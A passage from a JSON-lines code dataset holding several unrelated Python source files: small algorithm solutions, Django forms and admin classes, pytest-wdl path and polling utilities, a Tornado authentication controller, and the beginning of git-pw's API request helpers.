None\n","repo_name":"online-judge-tools/api-client","sub_path":"onlinejudge/dispatch.py","file_name":"dispatch.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"75"} +{"seq_id":"25042809881","text":"def maximum_index(l):\n if isinstance(l,list) == False or l == []:\n return None\n max = 0\n index = 0 \n for pos,i in enumerate(l):\n if i > max:\n max = i\n index = pos \n return index\n\nprint(maximum_index(\"papa\"))","repo_name":"thetheos/BAC1INFO1","sub_path":"Revision/mission4/max_index.py","file_name":"max_index.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"70049003442","text":"import math\nimport sys\ninput = sys.stdin.readline\n\n\ndef find_max(l, r):\n target = -9999999999\n while True:\n if l > r:\n break\n if l % 2:\n target = max(target, tree[l])\n l += 1\n if r % 2 == 0:\n target = max(tree[r], target)\n r -= 1\n r //= 2\n l //= 2\n return target\n\n\ndef swap(idx):\n if idx == 1:\n return\n else:\n if idx % 2:\n tree[idx // 2] = max(tree[idx-1], tree[idx])\n else:\n tree[idx // 2] = max(tree[idx], tree[idx+1])\n swap(idx//2)\n\n\nn, m, q = map(int, input().split())\n\narr = [*map(int, input().split())]\nh = int(math.log(n, 2)) if math.log(n, 2) / int(math.log(n, 2)) == 1 else int(math.log(n, 2)) + 1\n\nleft = list(sorted(map(int, input().split())))\nright = list(sorted(map(int, input().split())))\n\ntree = [-9999999999] * 2 ** (h+1)\nfor i in range(n):\n node = 2 ** h + i\n temp = arr[i]\n while node != 0:\n tree[node] = max(tree[node], temp)\n node //= 2\nfor _ in range(q):\n a, b = map(int, input().split())\n tree[2 ** h + a - 1], tree[2 ** h + b - 1] = tree[2 ** h + b - 1], tree[2 ** h + a - 1]\n swap(2 ** h + a - 1)\n swap(2 ** h + b - 1)\n dic = {}\n res = 0\n for i in range(m):\n if left[i] <= right[i]:\n if dic.get((left[i], right[i])) is None:\n dic[(left[i], right[i])] = find_max(2**h + left[i]-1, 2 ** h + right[i]-1)\n res = max(res, dic[(left[i], right[i])])\n else:\n res = 10 ** 9\n print(res)\n","repo_name":"SINHOLEE/Algorithm","sub_path":"python/beckjun/17082.py","file_name":"17082.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28635840036","text":"import fileinput\nimport itertools\nimport sys\n\nT = int(next(sys.stdin))\n\nfor t, N in enumerate(itertools.islice((int(line) for line in sys.stdin), T), 1):\n if N is 0:\n print('Case #{:d}: INSOMNIA'.format(t))\n else:\n digits = set()\n i = 0\n while len(digits) < 10:\n i += 1\n digits.update(set(str(i * N)))\n print('Case #{:d}: {:d}'.format(t, i * N))\n","repo_name":"DaHuO/Supergraph","sub_path":"codes/CodeJamCrawler/16_0_1_neat/16_0_1_jbnicolai_main.py","file_name":"16_0_1_jbnicolai_main.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32591380281","text":"from django import forms\nfrom .models import product\n\n\nclass prodForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = product\n\t\tfields = [\n\t\t\t'title',\n\t\t\t'description',\n\t\t\t'price'\n\t\t]\n\nclass RawProdForm(forms.Form):\n\ttitle = forms.CharField(widget=forms.TextInput(attrs = {\n\t\t\t\"placeholder\" : \"come on :)\"\n\t\t}))\n\tdescription = forms.CharField(required=False, widget=forms.Textarea(attrs = {\n\t\t\t\"class\" : \"newOne\",\n\t\t\t\"rows\" : 5,\n\t\t\t\"cols\" : 50,\n\t\t\t\"placeholder\" : \"just do it\"\n\t\t\t})\n\t\t)\n\tprice = forms.DecimalField(initial=0.00)","repo_name":"nikkeo/Projects-on-python","sub_path":"firstTryDjango/src/products/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"16746088614","text":"import contextlib\nimport fnmatch\nimport hashlib\nimport logging\nimport os\nfrom pathlib import Path\nimport re\nimport shutil\nimport stat\nimport tempfile\nimport time\nfrom typing import Callable, Optional, Sequence, Union, cast\n\nfrom py._path.local import LocalPath\n\n\nLOG = logging.getLogger(\"pytest-wdl\")\nLOG.setLevel(os.environ.get(\"LOGLEVEL\", \"WARNING\").upper())\n\nENV_PATH = \"PATH\"\nENV_CLASSPATH = \"CLASSPATH\"\nDEFAULT_CLASSPATH = \".\"\n\nUNSAFE_RE = re.compile(r\"[^\\w.-]\")\n\n\ndef safe_string(s: str, replacement: str = \"_\") -> str:\n \"\"\"\n Makes a string safe by replacing non-word characters.\n\n Args:\n s: The string to make safe\n replacement: The replacement stringj\n\n Returns:\n The safe string\n \"\"\"\n return UNSAFE_RE.sub(replacement, s)\n\n\n# def deprecated(f: Callable):\n# \"\"\"\n# Decorator for deprecated functions/methods. Deprecated functionality will be\n# removed before each major release.\n# \"\"\"\n# def decorator(*args, **kwargs):\n# LOG.warning(f\"Function/method {f.__name__} is deprecated and will be removed\")\n# f(*args, **kwargs)\n# return decorator\n\n\n@contextlib.contextmanager\ndef chdir(todir: Path):\n \"\"\"\n Context manager that temporarily changes directories.\n\n Args:\n todir: The directory to change to.\n \"\"\"\n curdir = Path.cwd()\n try:\n os.chdir(todir)\n yield todir\n finally:\n os.chdir(curdir)\n\n\n@contextlib.contextmanager\ndef tempdir(\n change_dir: bool = False,\n tmproot: Optional[Path] = None,\n cleanup: Optional[bool] = True,\n) -> Path:\n \"\"\"\n Context manager that creates a temporary directory, yields it, and then\n deletes it after return from the yield.\n\n Args:\n change_dir: Whether to temporarily change to the temp dir.\n tmproot: Root directory in which to create temporary directories.\n cleanup: Whether to delete the temporary directory before exiting the context.\n \"\"\"\n temp = ensure_path(tempfile.mkdtemp(dir=tmproot))\n try:\n if change_dir:\n with chdir(temp):\n yield temp\n else:\n yield temp\n finally:\n if cleanup:\n shutil.rmtree(temp)\n\n\n@contextlib.contextmanager\ndef context_dir(\n path: Optional[Path] = None,\n change_dir: bool = False,\n cleanup: Optional[bool] = None,\n) -> Path:\n \"\"\"\n Context manager that looks for a specific environment variable to specify a\n directory. If the environment variable is not set, a temporary directory is\n created and cleaned up upon return from the yield.\n\n Args:\n path: The environment variable to look for.\n change_dir: Whether to change to the directory.\n cleanup: Whether to delete the directory when exiting the context. If None,\n the directory is only deleted if a temporary directory is created.\n\n Yields:\n A directory path.\n \"\"\"\n if cleanup is None:\n cleanup = path is None\n\n if not path:\n path = Path(tempfile.mkdtemp())\n elif not path.exists():\n path.mkdir(parents=True)\n\n try:\n if change_dir:\n with chdir(path):\n yield path\n else:\n yield path\n finally:\n if cleanup and path.exists():\n shutil.rmtree(path, ignore_errors=True)\n\n\ndef ensure_path(\n path: Union[str, LocalPath, Path],\n search_paths: Optional[Sequence[Path]] = None,\n canonicalize: bool = True,\n exists: Optional[bool] = None,\n is_file: Optional[bool] = None,\n executable: Optional[bool] = None,\n create: bool = False,\n) -> Path:\n \"\"\"\n Converts a string path or :class:`py.path.local.LocalPath` to a\n :class:`pathlib.Path`.\n\n Args:\n path: The path to convert.\n search_paths: Directories to search for `path` if it is not already absolute.\n If `exists` is True, looks for the first search path that contains the file,\n otherwise just uses the first search path.\n canonicalize: Whether to return the canonicalized version of the path -\n expand home directory shortcut (~), make absolute, and resolve symlinks.\n exists: If True, raise an exception if the path does not exist; if False,\n raise an exception if the path does exist.\n is_file: If True, raise an exception if the path is not a file; if False,\n raise an exception if the path is not a directory.\n executable: If True and `is_file` is True and the file exists, raise an\n exception if it is not executable.\n create: Create the directory (or parent, if `is_file` = True) if\n it does not exist. Ignored if `exists` is True.\n\n Returns:\n A `pathlib.Path` object.\n \"\"\"\n if isinstance(path, Path):\n p = cast(Path, path)\n else:\n p = Path(str(path))\n\n p = Path(os.path.expandvars(p))\n\n if canonicalize:\n p = p.expanduser()\n\n if search_paths and not p.is_absolute():\n if exists:\n for search_path in search_paths:\n p_tmp = search_path / p\n if p_tmp.exists():\n p = p_tmp.absolute()\n break\n else:\n p = (search_paths[0] / p).absolute()\n\n p = p.resolve()\n\n if p.exists():\n if exists is False:\n raise FileExistsError(f\"Path {p} already exists\")\n if is_file is True:\n if p.is_dir():\n raise IsADirectoryError(f\"Path {p} is not a file\")\n elif executable and not is_executable(p):\n raise OSError(f\"File {p} is not executable\")\n elif is_file is False and not p.is_dir():\n raise NotADirectoryError(f\"Path {p} is not a directory\")\n elif exists is True:\n raise FileNotFoundError(f\"Path {p} does not exist\")\n elif create:\n if is_file:\n p.parent.mkdir(parents=True, exist_ok=True)\n else:\n p.mkdir(parents=True, exist_ok=True)\n\n return p\n\n\ndef resolve_file(\n filename: Union[str, Path], project_root: Path, assert_exists: bool = True\n) -> Optional[Path]:\n \"\"\"\n Finds `filename` under `project_root` or in the project path.\n\n Args:\n filename: The filename, relative path, or absolute path to resolve.\n project_root: The project root dir.\n assert_exists: Whether to raise an error if the file cannot be found.\n\n Returns:\n A `pathlib.Path` object, or None if the file cannot be found and\n `assert_exists` is False.\n\n Raises:\n FileNotFoundError if the file cannot be found and `assert_exists` is True.\n \"\"\"\n path = ensure_path(filename, canonicalize=False)\n is_abs = path.is_absolute()\n\n if is_abs and path.exists():\n return path\n\n if not is_abs:\n check_path = ensure_path(project_root / path)\n if check_path.exists():\n return check_path\n # Search in cwd\n check_path = find_project_path(path)\n if check_path and check_path.exists():\n return check_path\n # Search upward from project root\n check_path = find_project_path(path, start=project_root)\n if check_path and check_path.exists():\n return check_path\n\n if assert_exists:\n raise FileNotFoundError(f\"Could not resolve file: {filename}\")\n else:\n return None\n\n\ndef find_project_path(\n *filenames: Union[str, Path],\n start: Optional[Path] = None,\n return_parent: bool = False,\n assert_exists: bool = False,\n) -> Optional[Path]:\n \"\"\"\n Starting from `path` folder and moving upwards, search for any of `filenames` and\n return the first path containing any one of them.\n\n Args:\n *filenames: Filenames to search. Either a string filename, or a sequence of\n string path elements.\n start: Starting folder\n return_parent: Whether to return the containing folder or the discovered file.\n assert_exists: Whether to raise an exception if a file cannot be found.\n\n Returns:\n A `Path`, or `None` if no folder is found that contains any of `filenames`.\n If `return_parent` is `False` and more than one of the files is found one\n of the files is randomly selected for return.\n\n Raises:\n FileNotFoundError if the file cannot be found and `assert_exists` is True.\n \"\"\"\n path = start or Path.cwd()\n while path != path.parent:\n for filename in filenames:\n if isinstance(filename, str):\n found = list(path.glob(filename))\n found = found[0] if found else None\n else:\n found = path / filename\n if not found.exists():\n found = None\n if found:\n LOG.debug(\"Found %s in %s\", filename, path)\n if return_parent:\n return path\n else:\n return found\n else:\n path = path.parent\n\n if assert_exists:\n raise FileNotFoundError(\n f\"Could not find any of {','.join(str(f) for f in filenames)} \"\n f\"starting from {start}\"\n )\n\n return None\n\n\ndef find_executable_path(\n executable: str, search_path: Optional[Sequence[Path]] = None\n) -> Optional[Path]:\n \"\"\"Finds 'executable' in `search_path`.\n\n Args:\n executable: The name of the executable to find.\n search_path: The list of directories to search. If None, the system search\n path (defined by the $PATH environment variable) is used.\n\n Returns:\n Absolute path of the executable, or None if no matching executable was found.\n \"\"\"\n if search_path is None:\n if ENV_PATH in os.environ:\n search_path = [Path(p) for p in os.environ[ENV_PATH].split(os.pathsep)]\n else:\n return None\n for path in search_path:\n exe_path = path / executable\n if exe_path.exists() and is_executable(exe_path):\n return exe_path\n else:\n return None\n\n\ndef is_executable(path: Path) -> bool:\n \"\"\"\n Checks if a path is executable.\n\n Args:\n path: The path to check\n\n Returns:\n True if `path` exists and is executable by the user, otherwise False.\n \"\"\"\n return path.exists() and os.stat(path).st_mode & stat.S_IXUSR\n\n\ndef find_in_classpath(glob: str) -> Optional[Path]:\n \"\"\"\n Attempts to find a .jar file matching the specified glob pattern in the\n Java classpath.\n\n Args:\n glob: JAR filename pattern\n\n Returns:\n Path to the JAR file, or None if a matching file is not found.\n \"\"\"\n classpath = os.environ.get(ENV_CLASSPATH, DEFAULT_CLASSPATH)\n\n for path_str in classpath.split(os.pathsep):\n path = ensure_path(path_str)\n if path.exists():\n if path.is_dir():\n matches = list(path.glob(glob))\n if matches:\n if len(matches) > 1:\n LOG.warning(\n \"Found multiple jar files matching pattern %s: %s;\"\n \"returning the first one.\",\n glob,\n matches,\n )\n return matches[0]\n elif path.exists() and fnmatch.fnmatch(path.name, glob):\n return path\n\n\ndef env_map(d: dict) -> dict:\n \"\"\"\n Given a mapping of keys to value descriptors, creates a mapping of the keys to\n the described values.\n \"\"\"\n envmap = {}\n for name, value_descriptor in d.items():\n value = resolve_value_descriptor(value_descriptor)\n if value:\n envmap[name] = value\n return envmap\n\n\ndef resolve_value_descriptor(value_descriptor: Union[str, dict]) -> Optional:\n \"\"\"\n Resolves the value of a value descriptor, which may be an environment variable\n name, or a map with keys `env` (the environment variable name) and `value` (the\n value to use if `env` is not specified or if the environment variable is unset.\n\n Args:\n value_descriptor:\n\n Returns:\n\n \"\"\"\n if isinstance(value_descriptor, str):\n return os.environ.get(value_descriptor)\n elif \"env\" in value_descriptor:\n return os.environ.get(value_descriptor[\"env\"], value_descriptor.get(\"value\"))\n else:\n return value_descriptor.get(\"value\")\n\n\nclass DigestsNotEqualError(AssertionError):\n pass\n\n\ndef compare_files_with_hash(file1: Path, file2: Path, hash_name: str = \"md5\"):\n file1_digest = hash_file(file1, hash_name)\n file2_digest = hash_file(file2, hash_name)\n if file1_digest != file2_digest:\n raise DigestsNotEqualError(\n f\"{hash_name} digests differ between expected identical files \"\n f\"{file1}, {file2}\"\n )\n\n\ndef hash_file(path: Path, hash_name: str = \"md5\") -> str:\n assert hash_name in hashlib.algorithms_guaranteed\n with open(path, \"rb\") as inp:\n hashobj = hashlib.new(hash_name)\n hashobj.update(inp.read())\n return hashobj.hexdigest()\n\n\ndef verify_digests(path: Path, digests: dict):\n for hash_name, expected_digest in digests.items():\n try:\n actual_digest = hash_file(path, hash_name)\n except AssertionError: # TODO: test this\n LOG.warning(\n \"Hash algorithm %s is not supported; cannot verify file %s\",\n hash_name,\n path,\n )\n continue\n if actual_digest != expected_digest:\n raise DigestsNotEqualError(\n f\"{hash_name} digest {actual_digest} of file \"\n f\"{path} does match expected value {expected_digest}\"\n )\n\n\nclass PollingException(Exception):\n \"\"\"Base exception that stores the last result seen.\"\"\"\n def __init__(self, last=None):\n self.last = last\n\n\nclass TimeoutException(PollingException):\n \"\"\"Exception raised if polling function times out\"\"\"\n\n\nclass MaxCallException(PollingException):\n \"\"\"Exception raised if maximum number of iterations is exceeded\"\"\"\n\n\ndef poll(\n target: Callable,\n step: int = 1,\n args: Optional[Sequence] = None,\n kwargs: Optional[dict] = None,\n timeout: Optional[int] = None,\n max_tries: Optional[int] = None,\n check_success: Callable = bool,\n step_function: Optional[Callable[[int, int], int]] = None,\n ignore_exceptions: Sequence = (),\n):\n \"\"\"\n Poll by calling a target function until a certain condition is met. You must specify\n at least a target function to be called and the step -- base wait time between\n each function call.\n\n Vendored from the [polling](https://github.com/justiniso/polling) package.\n\n Args:\n target: The target callable\n step: Step defines the amount of time to wait (in seconds)\n args: Arguments to be passed to the target function\n kwargs: Keyword arguments to be passed to the target function\n timeout: The target function will be called until the time elapsed is greater\n than the maximum timeout (in seconds). NOTE that the actual execution\n time of the function *can* exceed the time specified in the timeout. For\n instance, if the target function takes 10 seconds to execute and the timeout\n is 21 seconds, the polling function will take a total of 30 seconds (two\n iterations of the target --20s which is less than the timeout--21s,\n and a final iteration)\n max_tries: Maximum number of times the target function will be called before\n failing\n check_success: A callback function that accepts the return value of the target\n function. It must return true if you want the polling function to stop\n and return this value. It must return false if you want to continue\n polling. You may also use this function to collect non-success values. The\n default is a callback that tests for truthiness (anything not False, 0,\n or empty collection).\n step_function: A callback function that accepts two arguments: current_step,\n num_tries; and returns the next step value. By default, this is constant,\n but you can also pass a function that will increase or decrease the step.\n As an example, you can increase the wait time between calling the target\n function by 10 seconds every iteration until the step is 100 seconds--at\n which point it should remain constant at 100 seconds\n\n >>> def my_step_function(current_step: int, num_tries: int) -> int:\n >>> return max(current_step + 10, 100)\n\n ignore_exceptions: You can specify a tuple of exceptions that should be caught\n and ignored on every iteration. If the target function raises one of\n these exceptions, it will be caught and the exception instance will be\n pushed to the queue of values collected during polling. Any other exceptions\n raised will be raised as normal.\n\n Returns:\n The first value from the target function that meets the condions of the\n check_success callback. By default, this will be the first value that is not\n None, 0, False, '', or an empty collection.\n \"\"\"\n max_time = time.time() + timeout if timeout else None\n tries = 0\n last_item = None\n\n if args is None:\n args = ()\n\n if kwargs is None:\n kwargs = {}\n\n while True:\n if max_tries and tries >= max_tries:\n raise MaxCallException(last_item)\n\n try:\n val = target(*args, **kwargs)\n last_item = val\n except ignore_exceptions as e:\n last_item = e\n else:\n # Condition passes, this is the only \"successful\" exit from the\n # polling function\n if check_success(val):\n return val\n\n tries += 1\n\n # Check the time after to make sure the poll function is called at least once\n if max_time and time.time() >= max_time:\n raise TimeoutException(last_item)\n\n time.sleep(step)\n\n if step_function:\n step = step_function(step, tries)\n","repo_name":"EliLillyCo/pytest-wdl","sub_path":"pytest_wdl/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":18200,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"75"} +{"seq_id":"20470517271","text":"\n## this is write by qingluan \n# just a inti handler \n# and a tempalte offer to coder\nimport json\nimport tornado\nimport tornado.web\nimport socks\nfrom tornado.websocket import WebSocketHandler\nfrom .libs import TornadoApi\nfrom .libs import TornadoArgs\n\nfrom mroylib import auth\nfrom mroylib.auth import Authentication\nfrom mroylib.config import Config\nimport logging\nimport os\n\ncon = Config(name='swordnode.ini')\ncon.section = 'user'\nauth.USER_DB_PATH = con['tel_user_db']\n\nlogging.basicConfig(level=logging.INFO)\n\nclass BaseHandler(tornado.web.RequestHandler):\n def prepare(self):\n self.db = self.settings['db']\n self.L = self.settings['L']\n self.tloop = tornado.ioloop.IOLoop.current()\n def get_current_user(self):\n return (self.get_cookie('user'),self.get_cookie('passwd'))\n def get_current_secure_user(self):\n return (self.get_cookie('user'),self.get_secure_cookie('passwd'))\n def set_current_seccure_user_cookie(self,user,passwd):\n self.set_cookie('user',user)\n self.set_secure_cookie(\"passwd\",passwd)\n\n def json_reply(self,data):\n self.write(json.dumps(data))\n\n\nclass SocketHandler(WebSocketHandler):\n \"\"\" Web socket \"\"\"\n clients = set()\n con = dict()\n \n @staticmethod\n def send_to_all(msg):\n for con in SocketHandler.clients:\n con.write_message(json.dumps(msg))\n \n @staticmethod\n def send_to_one(msg, id):\n SocketHandler.con[id(self)].write_message(msg)\n\n def json_reply(self, msg):\n self.write_message(json.dumps(msg))\n\n def open(self):\n SocketHandler.clients.add(self)\n SocketHandler.con[id(self)] = self\n \n def on_close(self):\n SocketHandler.clients.remove(self)\n \n def on_message(self, msg):\n SocketHandler.send_to_all(msg)\n\n\n\nclass AuthHandler(BaseHandler):\n\n @tornado.web.asynchronous\n def post(self):\n # you should get some argument from follow \n parser = TornadoArgs(self, tp='tornado')\n cmd = parser.get_parameter(\"cmd\")\n phone = parser.get_parameter(\"phone\")\n token = parser.get_parameter(\"token\")\n code = parser.get_parameter(\"code\")\n proxy = parser.get_parameter(\"proxy\")\n\n _auth = Authentication(self.settings['user_db_path'], loop=self.tloop)\n if cmd == 'regist':\n _auth.registe(phone, token)\n self.json_reply({'msg': 'regist ok'})\n self.finish()\n elif cmd == 'login':\n def _reply(x, client):\n \n self.json_reply({\"api\": x})\n self.finish()\n logging.info(f\"Loggin in: {phone} {code}\" )\n _auth.login(phone, code, _reply)\n \n elif cmd == 'auth':\n \n _auth.sendcode(phone)\n self.json_reply({'msg':'please recive code!'})\n self.finish()\n else:\n self.json_reply({\"msg\":f'error cmd: {cmd}'})\n self.finish()\n \n\nclass IndexHandler(BaseHandler):\n \n def prepare(self):\n super(IndexHandler, self).prepare()\n self.template = \"template/index.html\"\n\n def get(self):\n # L is log function , which include ok , info , err , fail, wrn\n self.L.ok('got')\n return self.render(self.template, post_page=\"/\")\n\n \n \n\n @tornado.web.asynchronous\n def post(self):\n # you should get some argument from follow \n parser = TornadoArgs(self, tp='tornado')\n proxy = parser.get_parameter(\"proxy\")\n\n api = TornadoApi(name=parser.module, loop=self.tloop, callback=parser.after_dealwith)\n logging.error(f\"Permission : {api.Permission}\")\n key = parser.get_parameter(\"Api-key\", l='head')\n if api.Permission == \"auth\" and key:\n \n if not key:\n self.json_reply({'error': 'No auth key!'})\n self.finish()\n else:\n logging.info(f\"load db: {self.settings['user_db_path']} \")\n _auth = Authentication(self.settings['user_db_path'], proxy=proxy, loop=self.tloop)\n if _auth.if_auth(key.strip()):\n res = api.run(*parser.args, **parser.kwargs)\n if res:\n self.json_reply({'msg': res})\n self.finish()\n else:\n self.json_reply({'error': 'No auth!'})\n self.finish()\n else:\n res = api.run(*parser.args, **parser.kwargs)\n if res:\n self.json_reply({'msg': res})\n self.finish()\n\n ","repo_name":"Qingluan/swordnode","sub_path":"swordserver/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":4622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"16904655969","text":"from django.contrib import admin\nfrom django.contrib.admin.models import DELETION, LogEntry\nfrom django.db.models import Exists, OuterRef\nfrom django.urls import reverse\nfrom django.utils.html import escape\nfrom django.utils.safestring import mark_safe\n\nfrom app.common.enums import GroupType\nfrom app.content import models\nfrom app.group.models.membership import Membership\n\nadmin.site.register(models.News)\nadmin.site.register(models.Category)\nadmin.site.register(models.PriorityPool)\nadmin.site.register(models.Cheatsheet)\nadmin.site.register(models.Page)\nadmin.site.register(models.ShortLink)\nadmin.site.register(models.Toddel)\nadmin.site.register(models.QRCode)\n\n\n@admin.register(models.Strike)\nclass StrikeAdmin(admin.ModelAdmin):\n list_display = (\n \"user\",\n \"event\",\n \"description\",\n \"strike_size\",\n )\n raw_id_fields = (\n \"user\",\n \"event\",\n \"creator\",\n )\n search_fields = (\n \"user__user_id\",\n \"event__title\",\n \"user__first_name\",\n \"user__last_name\",\n )\n\n\ndef admin_delete_registration(modeladmin, request, queryset):\n for registration in queryset:\n registration.admin_unregister()\n\n\n@admin.register(models.Registration)\nclass RegistrationAdmin(admin.ModelAdmin):\n list_display = (\"user\", \"event\", \"is_on_wait\", \"has_attended\")\n search_fields = (\n \"user__user_id\",\n \"event__title\",\n \"user__first_name\",\n \"user__last_name\",\n )\n readonly_fields = (\"created_at\", \"updated_at\")\n list_filter = (\n \"is_on_wait\",\n \"has_attended\",\n \"event\",\n \"user\",\n )\n # Enables checks bypassing from the 'Action' dropdown in Registration overview\n actions = [\n admin_delete_registration,\n ]\n\n\nclass SlackConnectedListFilter(admin.SimpleListFilter):\n \"\"\"Filters users checking if they have connected to their Slack-user\"\"\"\n\n title = \"har tilkoblet Slack-bruker\"\n parameter_name = \"slack_connected\"\n\n def lookups(self, *args, **kwargs):\n return (\n (\"true\", \"Ja\"),\n (\"false\", \"Nei\"),\n )\n\n def queryset(self, request, queryset):\n if self.value() == \"true\":\n return queryset.exclude(slack_user_id__exact=\"\")\n if self.value() == \"false\":\n return queryset.filter(slack_user_id__exact=\"\")\n\n\nclass AffiliatedStudyListFilter(admin.SimpleListFilter):\n \"\"\"Filters users checking if they're connected to a study\"\"\"\n\n title = \"har studie-medlemskap\"\n parameter_name = \"affiliated_study\"\n\n def lookups(self, *args, **kwargs):\n return (\n (\"true\", \"Ja\"),\n (\"false\", \"Nei\"),\n )\n\n def queryset(self, request, queryset):\n connected_query = Exists(\n Membership.objects.filter(\n user__user_id=OuterRef(\"pk\"), group__type=GroupType.STUDY\n )\n )\n if self.value() == \"true\":\n return queryset.filter(connected_query)\n if self.value() == \"false\":\n return queryset.filter(~connected_query)\n\n\nclass AffiliatedStudyyearListFilter(admin.SimpleListFilter):\n \"\"\"Filters users checking if they're connected to a studyyear\"\"\"\n\n title = \"har studieår-medlemskap\"\n parameter_name = \"affiliated_studyyear\"\n\n def lookups(self, *args, **kwargs):\n return (\n (\"true\", \"Ja\"),\n (\"false\", \"Nei\"),\n )\n\n def queryset(self, request, queryset):\n connected_query = Exists(\n Membership.objects.filter(\n user__user_id=OuterRef(\"pk\"), group__type=GroupType.STUDYYEAR\n )\n )\n if self.value() == \"true\":\n return queryset.filter(connected_query)\n if self.value() == \"false\":\n return queryset.filter(~connected_query)\n\n\n@admin.register(models.User)\nclass UserAdmin(admin.ModelAdmin):\n list_display = (\"user_id\", \"first_name\", \"last_name\")\n search_fields = (\"user_id\", \"first_name\", \"last_name\")\n\n list_filter = (\n \"gender\",\n \"public_event_registrations\",\n AffiliatedStudyListFilter,\n AffiliatedStudyyearListFilter,\n SlackConnectedListFilter,\n )\n\n\n@admin.register(models.Event)\nclass EventAdmin(admin.ModelAdmin):\n list_display = (\"title\", \"start_date\", \"location\", \"category\", \"organizer\")\n search_fields = (\n \"title\",\n \"description\",\n \"location\",\n )\n\n list_filter = (\n \"sign_up\",\n \"start_date\",\n \"category\",\n \"organizer\",\n )\n\n\nclass StrikesOverview(models.User):\n class Meta:\n verbose_name_plural = \"Strikes Overview\"\n proxy = True\n\n\n@admin.register(StrikesOverview)\nclass StrikesOverviewAdmin(UserAdmin):\n list_display = (\n \"user_id\",\n \"first_name\",\n \"last_name\",\n \"active_strikes\",\n )\n\n def active_strikes(self, obj):\n return obj.number_of_strikes\n\n def get_actions(self, request):\n \"\"\"Disallow bulk modifications/deletions of users through this panel.\"\"\"\n return []\n\n def get_queryset(self, request):\n qs = super().get_queryset(request)\n active_strikes = models.Strike.objects.active()\n return qs.filter(strikes__in=active_strikes).distinct()\n\n def has_add_permission(self, request):\n return False\n\n def has_change_permission(self, request, obj=None):\n return False\n\n def has_delete_permission(self, request, obj=None):\n return False\n\n\n@admin.register(LogEntry)\nclass LogEntryAdmin(admin.ModelAdmin):\n actions = None\n\n date_hierarchy = \"action_time\"\n\n list_filter = [\"user\", \"content_type\", \"action_flag\"]\n\n search_fields = [\"object_repr\", \"change_message\"]\n\n list_display = [\n \"action_time\",\n \"user\",\n \"content_type\",\n \"object_link\",\n \"action_flag\",\n ]\n\n def has_add_permission(self, request):\n return False\n\n def has_change_permission(self, request, obj=None):\n return False\n\n def has_delete_permission(self, request, obj=None):\n if \"admin/logentry\" in request.path:\n return False\n return True\n\n def has_view_permission(self, request, obj=None):\n return request.user.is_superuser\n\n def object_link(self, obj):\n if obj.action_flag == DELETION:\n link = escape(obj.object_repr)\n else:\n ct = obj.content_type\n link = '
%s' % (\n reverse(\n \"admin:%s_%s_change\" % (ct.app_label, ct.model),\n args=[obj.object_id],\n ),\n escape(obj.object_repr),\n )\n return mark_safe(link)\n\n object_link.admin_order_field = \"object_repr\"\n object_link.short_description = \"object\"\n","repo_name":"TIHLDE/Lepton","sub_path":"app/content/admin/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":6770,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"75"} +{"seq_id":"24112852516","text":"\"\"\"\nSimple wrappers around request methods.\n\"\"\"\n\nfrom functools import update_wrapper\nimport logging\nimport os.path\nimport re\nimport sys\nimport tempfile\nimport typing as ty\n\nimport click\nimport requests\n\nimport git_pw\nfrom git_pw import config\n\nCONF = config.CONF\nLOG = logging.getLogger(__name__)\n\nFilters = ty.List[ty.Tuple[str, str]]\n\n\nclass HTTPTokenAuth(requests.auth.AuthBase):\n \"\"\"Attaches HTTP Token Authentication to the given Request object.\"\"\"\n\n def __init__(self, token: str):\n self.token = token\n\n def __call__(\n self,\n r: requests.PreparedRequest,\n ) -> requests.PreparedRequest:\n r.headers['Authorization'] = self._token_auth_str(self.token)\n return r\n\n @staticmethod\n def _token_auth_str(token: str) -> str:\n \"\"\"Return a Token auth string.\"\"\"\n return 'Token {}'.format(token.strip())\n\n\ndef _get_auth(optional: bool = False) -> ty.Optional[requests.auth.AuthBase]:\n if CONF.token:\n return HTTPTokenAuth(CONF.token)\n elif CONF.username and CONF.password:\n return requests.auth.HTTPBasicAuth(CONF.username, CONF.password)\n elif not optional:\n LOG.error('Authentication information missing')\n LOG.error(\n 'You must configure authentication via git-config or via '\n '--token or --username, --password'\n )\n sys.exit(1)\n return None\n\n\ndef _get_headers() -> ty.Dict[str, str]:\n return {\n 'User-Agent': 'git-pw ({})'.format(git_pw.__version__),\n }\n\n\ndef _get_server() -> str:\n if CONF.server:\n server = CONF.server.rstrip('/')\n\n if not re.match(r'.*/api/\\d\\.\\d$', server):\n LOG.warning('Server version missing')\n LOG.warning(\n 'You should provide the server version in the URL '\n 'configured via git-config or --server'\n )\n LOG.warning('This will be required in git-pw 2.0')\n\n if not re.match(r'.*/api(/\\d\\.\\d)?$', server):\n # NOTE(stephenfin): We've already handled this particular error\n # above so we don't warn twice. We also don't stick on a version\n # number since the user clearly wants the latest\n server += '/api'\n\n return server\n else:\n LOG.error('Server information missing')\n LOG.error(\n 'You must provide server information via git-config or via '\n '--server'\n )\n sys.exit(1)\n\n\ndef _get_project() -> str:\n if CONF.project and CONF.project.strip() == '*':\n return '' # just don't bother filtering on project\n elif CONF.project:\n return CONF.project.strip()\n else:\n LOG.error('Project information missing')\n LOG.error(\n 'You must provide project information via git-config or '\n 'via --project'\n )\n LOG.error('To list all projects, set project to \"*\"')\n sys.exit(1)\n\n\ndef _handle_error(\n operation: str,\n exc: requests.exceptions.RequestException,\n) -> None:\n if exc.response is not None and exc.response.content:\n # server errors should always be reported\n if exc.response.status_code in range(500, 512): # 5xx Server Error\n 